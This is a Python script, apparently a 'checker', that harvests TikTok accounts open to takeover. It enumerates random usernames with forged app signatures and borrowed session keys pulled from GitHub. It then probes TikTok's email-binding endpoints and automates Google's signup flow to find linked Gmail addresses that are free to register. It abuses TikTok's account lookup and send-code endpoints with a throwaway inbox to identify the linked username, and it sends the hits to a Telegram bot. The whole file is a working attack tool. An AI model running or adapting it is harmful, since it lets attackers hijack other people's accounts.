import requests,random,uuid,SignerPy,re,json,datetime,time,ms4,os,binascii,secrets,string;from concurrent.futures import ThreadPoolExecutor;from MedoSigner import Argus,Gorgon,Ladon,md5
class TikTokChecker:
    def __init__(self):
        self.ss=[];self.dv=[];self.dv=[];self.bh=0;self.bt=0;self.bg=0;self.bk=0
        self.colors={"R":"\033[91m","G":"\033[92m","Y":"\033[93m","B":"\033[94m","M":"\033[95m","C":"\033[96m","W":"\033[97m","X":"\033[0m"}
        self.headers={"User-Agent":"Mozilla/5.0"}
        self.tok="";self.idd="";self.users=set()            
    def get_inputs(self):        
        self.idd=input(f"{self.colors['C']}Enter Telegram ID : {self.colors['W']}");self.tok=input(f"{self.colors['C']}Enter Telegram Token : {self.colors['W']}")
        os.system('clear')
    def gh(self):
        try:
            rr=requests.get("https://raw.githubusercontent.com/is-L7N/session_keys/refs/heads/main/github.txt",headers=self.headers,timeout=30)
            self.ss=rr.text.splitlines()
        except:
            self.ss=[]
    def g2(self):
        try:
            rs=requests.get("https://raw.githubusercontent.com/is-L7N/dv2/refs/heads/main/dv.txt",headers=self.headers,timeout=30)
            for ln in rs.text.splitlines():
                tk=ln.strip().split(":")
                if len(tk)>=2:
                    self.dv.append((tk[0],tk[1]))
        except:
            pass    
    def V12(self):
        kew=random.choice(['abcdefghijklmnopqrstuvwxyz','abcdefghijklmnopqrstuvwxyzñáéíóúü','abcdefghijklmnopqrstuvwxyzṣọẹ̀áéíóú','abcdefghijklmnopqrstuvwxyzñáéíóúü','ကခဂဃငစဆဇဈဉညတထဒဓနပဖဗဘမယရလဝသဟဠအ','abcdefghijklmnopqrstuvwxyzɛɔŋ'])
        k=''.join((random.choice(kew)for i in range(random.randrange(2,9))))
        return k
    def search_users(self):
        username=self.V12()
        url="https://search16-normal-c-alisg.tiktokv.com/aweme/v1/search/user/sug/?iid="+str(random.randint(1,10**19))+"&device_id="+str(random.randint(1,10**19))+"&ac=wifi&channel=googleplay&aid=1233&app_name=musical_ly&version_code=300102&version_name=30.1.2&device_platform=android&os=android&ab_version=30.1.2&ssmix=a&device_type=RMX3511&device_brand=realme&language=ar&os_api=33&os_version=13&openudid="+str(binascii.hexlify(os.urandom(8)).decode())+"&manifest_version_code=2023001020&resolution=1080*2236&dpi=360&update_version_code=2023001020&_rticket="+str(round(random.uniform(1.2,1.6)*100000000)*-1)+"4632"+"&current_region=IQ&app_type=normal&sys_region=IQ&mcc_mnc=41805&timezone_name=Asia%2FBaghdad&carrier_region_v2=418&residence=IQ&app_language=ar&carrier_region=IQ&ac2=wifi&uoo=0&op_region=IQ&timezone_offset=10800&build_number=30.1.2&host_abi=arm64-v8a&locale=ar&region=IQ&content_language=gu%2C&ts="+str(round(random.uniform(1.2,1.6)*100000000)*-1)+"&cdid="+str(uuid.uuid4())+""
        payload={'keyword':username,'count':"100",'source':"tt_ffp_add_friends",'mention_type':"0"}
        headers={'Host':'search16-normal-c-alisg.tiktokv.com','User-Agent':"com.zhiliaoapp.musically/2023105030(Linux;U;Android13;ar_IQ;RMX3511;Build/TP1A.220624.014;Cronet/TTNetVersion:2fdb62f92023-09-06QuicVersion:bb24d47c2023-07-19)"}
        try:
            x_ss_stub=md5(payload['keyword'].encode('utf-8')).hexdigest()
            unix=int(time.time())
            sec_device_id="AadCFwpTyztA5j9L"+''.join(secrets.choice(string.ascii_letters+string.digits)for _ in range(9))
            headers.update(Gorgon(url.split('?')[1],unix,payload['keyword'],None).get_value())
            headers.update({"x-ladon":Ladon.encrypt(unix,1611921764,1233),"x-argus":Argus.get_sign(url.split('?')[1],x_ss_stub,unix,platform=19,aid=1233,license_id=1611921764,sec_device_id=sec_device_id,sdk_version="2.3.1.i18n",sdk_version_int=2)})
        except:
            pass
        try:
            rs=requests.post(url,data=payload,headers=headers,timeout=15)
            data=rs.json()
            ids=[item["extra_info"].get("sug_uniq_id")for item in data.get("sug_list",[])if"extra_info"in item and"sug_uniq_id"in item["extra_info"]and re.fullmatch(r"[A-Za-z0-9_]+",item["extra_info"]["sug_uniq_id"])]
            for user in ids:
                if user not in self.users:
                    self.ch(user)
        except:
            pass
    def ch(self,em):
        pm={'device_platform':'android','ssmix':'a','locale':'en','language':'en','channel':'googleplay','aid':"1233",'app_name':'musical_ly','version_code':'360505','version_name':'36.5.5','manifest_version_code':'2023605050','update_version_code':'2023605050','ab_version':'36.5.5','os_version':'10',"device_id":0,'app_version':'30.1.2',"request_from":"profile_card_v2","request_from_scene":'1',"scene":"1","mix_mode":"1","os_api":"34","ac":"wifi","request_tag_from":"h5"}
        pm.update({'device_type':f'rk{random.randint(3000,4000)}s_{uuid.uuid4().hex[:4]}'})
        try:
            pm=SignerPy.get(params=pm)
        except:
            pass
        hh={'User-Agent':f'com.zhiliaoapp.musically/2022703020(Linux;U;Android7.1.2;en;SM-N975F;Build/N2G48H;tt-ok/{str(random.randint(1,10**19))})'}
        ck={"sessionid":random.choice(self.ss)if self.ss else str(random.randint(1,10**19))}
        dt={'email':f'{em}@gmail.com'}
        domains=["api31-normal-useast2a.tiktokv.com","api22-normal-c-alisg.tiktokv.com","api2.musical.ly","api16-normal-no1a.tiktokv.eu","rc-verification-sg.tiktokv.com","api31-normal-alisg.tiktokv.com","api16-normal-c-useast1a.tiktokv.com","api22-normal-c-useast1a.tiktokv.com","api16-normal-c-useast1a.musical.ly","api19-normal-c-useast1a.musical.ly","api.tiktokv.com","www.tiktok.com","log2.musical.ly","webcast.musical.ly","inapp.tiktokv.com","api2-19-h2.musical.ly"]
        for _ in range(3):
            try:
                if self.dv:
                    di,ii=random.choice(self.dv)
                    pm.update({"device_id":di,"iid":ii})
                ur=f'https://{random.choice(domains)}/passport/email/bind_without_verify/'
                try:
                    sg=SignerPy.sign(params=pm,cookie=ck,data=dt)
                    hh.update(sg)
                except:
                    pass
                rs=requests.post(ur,data=dt,headers=hh,params=pm,cookies=ck,timeout=15)
                if "Email is linked to another account. Unlink or try another email."in rs.text:
                    self.bh+=1
                    self.update_stats()
                    self.gm(em)
                    break
                else:
                    self.bt+=1
                    self.update_stats()
                    break
            except:
                time.sleep(1)
                continue    
    def gm(self,em):
        for _ in range(3):
            try:
                ss=requests.Session()
                hh={'accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','accept-language':'en-US,en;q=0.9','user-agent':'Mozilla/5.0(Linux;Android13;SM-G981B)AppleWebKit/537.36(KHTML,likeGecko)Chrome/116.0.0.0MobileSafari/537.36','x-browser-channel':'stable','x-browser-copyright':'Copyright2024GoogleLLC.Allrightsreserved.'}
                pp={'biz':'false','continue':'https://mail.google.com/mail/u/0/','ddm':'1','emr':'1','flowEntry':'SignUp','flowName':'GlifWebSignIn','followup':'https://mail.google.com/mail/u/0/','osid':'1','service':'mail'}
                rr=ss.get('https://accounts.google.com/lifecycle/flows/signup',params=pp,headers=hh,timeout=15)
                if'TL='not in rr.url or'"SNlM0e":"'not in rr.text or'"Qzxixc":"'not in rr.text:
                    continue
                tl=rr.url.split('TL=')[1].split('&')[0]
                s1=rr.text.split('"Qzxixc":"')[1].split('"')[0]
                at=rr.text.split('"SNlM0e":"')[1].split('"')[0]
                nn=''.join(random.choice('abcdefghijklmnopqrstuvwxyz')for _ in range(random.randrange(5,10)))
                hh={'accept':'*/*','accept-language':'en-US,en;q=0.9','content-type':'application/x-www-form-urlencoded;charset=UTF-8','origin':'https://accounts.google.com','referer':'https://accounts.google.com/','user-agent':'Mozilla/5.0(Linux;Android13;SM-G981B)AppleWebKit/537.36(KHTML,likeGecko)Chrome/116.0.0.0MobileSafari/537.36','x-goog-ext-278367001-jspb':'["GlifWebSignIn"]','x-goog-ext-391502476-jspb':f'["{s1}"]','x-same-domain':'1'}
                pp={'rpcids':'E815hb','source-path':'/lifecycle/steps/signup/name','hl':'en-US','TL':tl,'rt':'c'}
                dd=f'f.req=%5B%5B%5B%22E815hb%22%2C%22%5B%5C%22{nn}%5C%22%2C%5C%22%5C%22%2Cnull%2Cnull%2Cnull%2C%5B%5D%2C%5B%5C%22https%3A%2F%2Fmail.google.com%2Fmail%2Fu%2F0%2F%5C%22%2C%5C%22mail%5C%22%5D%2C1%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at={at}&'
                nr=ss.post('https://accounts.google.com/lifecycle/_/AccountLifecyclePlatformSignupUi/data/batchexecute',params=pp,headers=hh,data=dd,timeout=15)
                if 'steps/signup/birthdaygender'not in nr.text:
                    continue
                yy,mm,dd=random.randrange(1980,2010),random.randrange(1,12),random.randrange(1,28)
                pp['source-path']='/lifecycle/steps/signup/birthdaygender'
                bd=f'f.req=%5B%5B%5B%22eOY7Bb%22%2C%22%5B%5B{yy}%2C{mm}%2C{dd}%5D%2C1%2Cnull%2Cnull%2Cnull%2C%5C%22%3Cf7Nqs-%5C%22%2C%5Bnull%2Cnull%2C%5C%22https%3A%2F%2Fmail.google.com%2Fmail%2Fu%2F0%2F%5C%22%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2C%5C%22mail%5C%22%5D%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at={at}&'
                br=ss.post('https://accounts.google.com/lifecycle/_/AccountLifecyclePlatformSignupUi/data/batchexecute',params=pp,headers=hh,data=bd,timeout=15)
                if 'steps/signup/username'not in br.text:
                    continue
                pp['source-path']='/lifecycle/steps/signup/username'
                ed=f'f.req=%5B%5B%5B%22NHJMOd%22%2C%22%5B%5C%22{em}%5C%22%2C0%2C0%2Cnull%2C%5Bnull%2Cnull%2Cnull%2Cnull%2C1%2C152855%5D%2C0%2C40%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at={at}&'
                er=ss.post('https://accounts.google.com/lifecycle/_/AccountLifecyclePlatformSignupUi/data/batchexecute',params=pp,headers=hh,data=ed,timeout=15)
                if 'steps/signup/password'in er.text:
                    self.ex(em)
                    break
                else:
                    self.bg+=1
                    self.update_stats()
                    break
            except:
                time.sleep(1)
                continue    
    def ex(self,em):
        for _ in range(3):
            try:
                ss=requests.Session()
                gm=em+'@gmail.com'
                pm={'device_platform':'android','ssmix':'a','channel':'googleplay','aid':'1233','app_name':'musical_ly','version_code':'360505','version_name':'36.5.5','manifest_version_code':'2023605050','update_version_code':'2023605050','ab_version':'36.5.5','os_version':'10',"device_id":0000000000,'app_version':'30.1.2',"request_from":"profile_card_v2","request_from_scene":'1',"scene":"1","mix_mode":"1","os_api":"34","ac":"wifi","request_tag_from":"h5"}
                hd={'User-Agent':f'com.zhiliaoapp.musically/2022703020(Linux;U;Android7.1.2;en;SM-N975F;Build/N2G48H;tt-ok/{str(random.randint(1,10**19))})'}
                try:
                    pm=SignerPy.get(params=pm)
                except:
                    pass
                pm.update({'device_type':f'rk{random.randint(3000,4000)}s_{uuid.uuid4().hex[:4]}','language':'AR'})
                tk=None
                domains=["api31-normal-useast2a.tiktokv.com","api22-normal-c-alisg.tiktokv.com","api2.musical.ly","api16-normal-useast5.tiktokv.us","api16-normal-no1a.tiktokv.eu","rc-verification-sg.tiktokv.com","api31-normal-alisg.tiktokv.com","api16-normal-c-useast1a.tiktokv.com","api22-normal-c-useast1a.tiktokv.com","api16-normal-c-useast1a.musical.ly","api19-normal-c-useast1a.musical.ly","api.tiktokv.com","www.tiktok.com","log2.musical.ly","webcast.musical.ly","inapp.tiktokv.com","api2-19-h2.musical.ly"]
                for _ in range(5):
                    pm["account_param"]=gm
                    try:
                        sg=SignerPy.sign(params=pm);h2=hd.copy()
                        h2.update({'x-tt-passport-csrf-token':uuid.uuid4().hex,'x-ss-req-ticket':sg['x-ss-req-ticket'],'x-argus':sg['x-argus'],'x-gorgon':sg['x-gorgon'],'x-khronos':sg['x-khronos'],'x-ladon':sg['x-ladon']})
                    except:
                        h2=hd
                    ul=f'https://{random.choice(domains)}/passport/account_lookup/email/'
                    try:
                        rp=ss.post(ul,params=pm,headers=h2,timeout=15)
                        dt=rp.json()
                        if 'data'in dt and'accounts'in dt['data']and dt['data']['accounts']:
                            tk=dt['data']['accounts'][0]['passport_ticket']
                            break
                    except:
                        continue
                if not tk:
                    continue
                fk=None
                for _ in range(5):
                    try:
                        rs=requests.get("https://api.mail.tm/domains",headers={"Content-Type":"application/json","User-Agent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)"},timeout=15);dd=rs.json()
                        dm=dd["hydra:member"][0]["domain"]
                        ml=''.join(random.choice("qwertyuiopasdfghjklzxcvbnm")for _ in range(12))+"@"+dm
                        pl={"address":ml,"password":ml}
                        rs=requests.post("https://api.mail.tm/accounts",json=pl,headers={"Content-Type":"application/json","User-Agent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)"},timeout=15)
                        rs=requests.post("https://api.mail.tm/token",json=pl,headers={"Content-Type":"application/json","User-Agent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)"},timeout=15);tn=rs.json().get("token")
                        if tn:
                            fk=(ml,tn)
                            break
                    except:
                        continue
                if not fk:
                    continue
                for _ in range(5):
                    pm["not_login_ticket"]=tk;pm["email"]=fk[0]
                    pm["type"]="3737";pm.pop("fixed_mix_mode",None)
                    pm.pop("account_param",None)
                    try:
                        sg=SignerPy.sign(params=pm);h3=hd.copy()
                        h3.update({'x-ss-req-ticket':sg['x-ss-req-ticket'],'x-argus':sg['x-argus'],'x-gorgon':sg['x-gorgon'],'x-khronos':sg['x-khronos'],'x-ladon':sg['x-ladon']})
                    except:
                        h3=hd
                    send_domains=['api22-normal-c-alisg.tiktokv.com','api31-normal-alisg.tiktokv.com','api22-normal-probe-useast2a.tiktokv.com','api16-normal-probe-useast2a.tiktokv.com','rc-verification-sg.tiktokv.com']
                    ul=f"https://{random.choice(send_domains)}/passport/email/send_code"
                    try:
                        rp=ss.post(ul,params=pm,headers=h3,timeout=15)
                        rd=rp.json()
                        if rd.get("message")=="success":
                            for _ in range(20):
                                try:
                                    rs=requests.get("https://api.mail.tm/messages",headers={"Authorization":f"Bearer{fk[1]}","Content-Type":"application/json","User-Agent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)"},timeout=15)
                                    ib=rs.json()
                                    mg=ib.get("hydra:member",[])
                                    if mg:
                                        ix=mg[0]["id"]
                                        rs=requests.get(f"https://api.mail.tm/messages/{ix}",headers={"Authorization":f"Bearer{fk[1]}","Content-Type":"application/json","User-Agent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)"},timeout=15)
                                        ms=rs.json()
                                        tx=ms.get("text","")
                                        if tx:
                                            r1=re.search(r'تم إنشاء هذا البريد الإلكتروني من أجل\s+(.+)\.',tx)
                                            if r1:
                                                un=r1.group(1)
                                            else:
                                                pt=[r"This email was created for\s+(.+)\.",r'created for\s+(.+)\.',r'username\s*:\s*([^\s,]+)',r'@(\w+)']
                                                un=None
                                                for pn in pt:
                                                    mh=re.search(pn,tx)
                                                    if mh:
                                                        un=mh.group(1)
                                                        break
                                            if un:
                                                return self.extract_user_info(un,gm,fk)
                                except:
                                    pass
                                time.sleep(3)
                    except:
                        continue
                break
            except:
                time.sleep(1)
                continue
        return False    
    def extract_user_info(self,un,gm,fk):
        try:
            ca=ms4.InfoTik.TikTok_Info(un);id=ca.get('id','N/A')
            flag=ca.get('flag','')
            if id=='N/A':
                level="idk"
            else:
                url="https://webcast16-normal-no1a.tiktokv.eu/webcast/user/?request_from=profile_card_v2&request_from_scene=1&target_uid="+str(id)+"&iid="+str(random.randint(1,10**19))+"&device_id="+str(random.randint(1,10**19))+"&ac=wifi&channel=googleplay&aid=1233&app_name=musical_ly&version_code=300102&version_name=30.1.2&device_platform=android&os=android&ab_version=30.1.2&ssmix=a&device_type=RMX3511&device_brand=realme&language=ar&os_api=33&os_version=13&openudid="+str(binascii.hexlify(os.urandom(8)).decode())+"&manifest_version_code=2023001020&resolution=1080*2236&dpi=360&update_version_code=2023001020&_rticket="+str(round(random.uniform(1.2,1.6)*100000000)*-1)+"4632"+"&current_region=IQ&app_type=normal&sys_region=IQ&mcc_mnc=41805&timezone_name=Asia%2FBaghdad&carrier_region_v2=418&residence=IQ&app_language=ar&carrier_region=IQ&ac2=wifi&uoo=0&op_region=IQ&timezone_offset=10800&build_number=30.1.2&host_abi=arm64-v8a&locale=ar&region=IQ&content_language=gu%2C&ts="+str(round(random.uniform(1.2,1.6)*100000000)*-1)+"&cdid="+str(uuid.uuid4())+"&webcast_sdk_version=2920&webcast_language=ar&webcast_locale=ar_IQ";headers={'User-Agent':"com.zhiliaoapp.musically/2023001020(Linux;U;Android13;ar;RMX3511;Build/TP1A.220624.014;Cronet/TTNetVersion:06d6a5832023-04-17QuicVersion:d298137e2023-02-13)"}
                try:
                    x_ss_stub=md5(b'').hexdigest();unix=int(time.time())
                    sec_device_id="AadCFwpTyztA5j9L"+''.join(secrets.choice(string.ascii_letters+string.digits)for _ in range(9))
                    headers.update(Gorgon(url.split('?')[1],unix,'',None).get_value())
                    headers.update({"x-ladon":Ladon.encrypt(unix,1611921764,1233),"x-argus":Argus.get_sign(url.split('?')[1],x_ss_stub,unix,platform=19,aid=1233,license_id=1611921764,sec_device_id=sec_device_id,sdk_version="2.3.1.i18n",sdk_version_int=2)})
                except:
                    pass
                try:
                    response=requests.get(url,headers=headers)
                    level_match=re.search(r'"default_pattern":"(.*?)"',response.text)
                    if level_match:
                        level_text=level_match.group(1)
                        level=level_text.split('المستوى رقم')[1].strip()if'المستوى رقم'in level_text else level_text
                    else:
                        level="idk"
                except:
                    level="idk"
            lev=level if'level'in locals()else"idk";uu=f"https://www.tiktok.com/@{un}"
            try:
                rx=requests.get(uu,headers={'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36'},timeout=5);mx=re.search(r'({"__DEFAULT_SCOPE__":.*})</script>',rx.text)
                dx=json.loads(mx.group(1))["__DEFAULT_SCOPE__"]["webapp.user-detail"]["userInfo"];us,st=dx["user"],dx["stats"];ix=us.get('id','');d2=datetime.datetime.fromtimestamp(us.get("createTime",0),datetime.timezone.utc).strftime("%Y/%m/%d")if us.get("createTime")else"N/A"
                nf={"username":un,"name":us.get("nickname",""),"id":ix,"followers":st.get("followerCount",""),"following":st.get("followingCount",""),"likes":st.get("heartCount",""),"videos":st.get("videoCount",""),"created":d2,'avatarLarger':us.get('avatarMedium','')}
                self.bk+=1;self.update_stats();sd=f"email:{gm}\nusername:@{nf['username']}\nname:{nf['name']}\nid:{nf['id']}\nfollowers:{nf['followers']}\nfollowing:{nf['following']}\nlikes:{nf['likes']}\nvideos:{nf['videos']}\ncreated:{nf['created']}\ncountry:{flag}\nlevel:{lev}"
                with open("hits.txt","a",encoding='utf-8')as ff:
                    ff.write(sd+"\n")
                try:
                    requests.post(f"https://api.telegram.org/bot{self.tok}/sendMessage",params={'chat_id':self.idd,'text':sd,'parse_mode':'HTML'},timeout=10)
                except:
                    pass
                return nf
            except Exception as e:
                self.bk+=1;self.update_stats();sd=f'email:{gm}'
                with open("hits1.txt","a",encoding='utf-8')as ff:
                    ff.write(sd+'\n')
                try:
                    requests.post(f"https://api.telegram.org/bot{self.tok}/sendMessage",params={'chat_id':self.idd,'text':sd,'parse_mode':'HTML'},timeout=10)
                except:
                    pass
                return False
        except Exception as e:
            return False    
    def update_stats(self):
        print(f"\r{self.colors['C']}god tk{self.colors['W']}:{self.colors['G']}{self.bh}{self.colors['W']}|{self.colors['Y']}bad tk{self.colors['W']}:{self.colors['R']}{self.bt}{self.colors['W']}|{self.colors['M']}bad gm{self.colors['W']}:{self.colors['R']}{self.bg}{self.colors['W']}|{self.colors['B']}hits{self.colors['W']}:{self.colors['G']}{self.bk}{self.colors['X']}",end='',flush=True)   
    def mn(self):
        self.get_inputs();self.gh();self.g2()
        with ThreadPoolExecutor(max_workers=10)as ex:
            for _ in range(100):
                ex.submit(self.search_users)
            time.sleep(2)
if __name__=="__main__":
    checker=TikTokChecker();checker.mn()
